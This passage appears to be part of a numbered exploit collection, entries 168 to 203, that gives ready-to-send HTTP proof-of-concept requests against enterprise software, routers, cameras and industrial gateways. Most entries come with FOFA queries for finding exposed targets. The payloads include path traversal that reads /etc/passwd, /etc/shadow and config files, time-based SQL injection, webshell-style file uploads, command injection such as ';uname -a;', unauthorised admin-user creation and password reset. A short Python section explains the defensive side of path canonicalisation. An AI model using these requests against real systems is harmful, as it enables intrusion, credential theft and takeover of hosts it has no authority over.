GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. Hongjing EHR (宏景EHR) OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. Hongjing EHR (宏景EHR) downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. Hongjing EHR (宏景EHR) DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. Tongtianxing (通天星) CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera (DT-高清车牌识别摄像机) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. Jinhe OA (金和OA) C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. Jinhe OA (金和OA) C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
One request path per device model (the .cfg name matches the model):
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Then fetch the uploaded file:
GET /imc/primepush/%2e%2e/flex/12234.txt

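The two H3C entries above, like the `/templates/attestation/../../` prefix in entries 169 and 170 and the encoded `..%2F` chain in entry 160, all rely on one mismatch: some check looks at the raw request URI (an allow-list of public prefixes such as the login page or a push servlet), while the container resolves `..` and `%2e%2e` before routing, so the request is authorised as one path and served as another. The page shows only the paths, not the vendors' code, so the Python below is an added example written for this page: the allow-list prefixes and the bounded three-round decode loop are assumptions chosen to illustrate the pattern. It places the bypassed check beside one that canonicalises first, and computes the path each of this page's traversal requests actually reaches.

```python
# Added example for this page (not H3C or any vendor's code, not from the original post).
# PUBLIC_PREFIXES and the decode-loop depth are assumptions used for illustration.
from urllib.parse import unquote

# Hypothetical allow-list of paths that are reachable without a session.
PUBLIC_PREFIXES = ("/userLogin.asp", "/imc/primepush/")


def canonical_path(raw_uri: str) -> str:
    """Return the path a container would actually route: query stripped, percent-
    encoding removed (repeatedly, so %252e%252e is caught as well), empty and '.'
    segments dropped, '..' resolved and clamped at the root."""
    path = raw_uri.split("?", 1)[0]
    for _ in range(3):                      # bounded: "%25" -> "%" -> "%" then stops
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:                    # '..' at the root has nothing to pop
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def weak_allows(raw_uri: str) -> bool:
    """The check being bypassed: allow-list applied to the raw URI as received."""
    return raw_uri.startswith(PUBLIC_PREFIXES)


def hardened_allows(raw_uri: str) -> bool:
    """Canonicalise first, refuse anything that still carries percent signs or
    backslashes, then apply the same allow-list to what will really be served."""
    canon = canonical_path(raw_uri)
    if "%" in canon or "\\" in canon:
        return False
    return canon.startswith(PUBLIC_PREFIXES)


def bypass_candidates(raw_uris):
    """Requests the weak check admits but the hardened one refuses, with the path
    they really reach; usable as a log filter for entries 160, 169, 170, 177, 178."""
    return [(u, canonical_path(u)) for u in raw_uris
            if weak_allows(u) and not hardened_allows(u)]


if __name__ == "__main__":
    for raw, real in bypass_candidates([
        "/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg",
        "/imc/primepush/%2e%2e/flexFileUpload",
        "/imc/primepush/push.js",
    ]):
        print(f"{raw}  ->  {real}")
```

The order of operations is the whole point: decode, then resolve, then compare. A filter that compares before decoding sees `/imc/primepush/%2e%2e/flexFileUpload` as a push-servlet request; the container sees `/imc/flexFileUpload`.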

179. Jianwen (建文) engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

The request body is a raw INSERT statement that the endpoint executes as-is.

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

The stacked query writes the unhex()'d PHP probe (<?php echo md5("1"); $file = __FILE__; unlink($file);) to WebRoot\plom.xgi with INTO OUTFILE, so the flaw is also an arbitrary file write.

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

(The RANDOMBLOB heavy query is the SQLite time-based technique: the backend is SQLite, so WAITFOR and SLEEP do not apply here.)

187. Mura CMS processAsyncObject SQL injection (time-based variant of entry 158)
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet access behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload

1. Send the PoC request to obtain the csrf value, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returns:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) omnimedia news gathering and editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--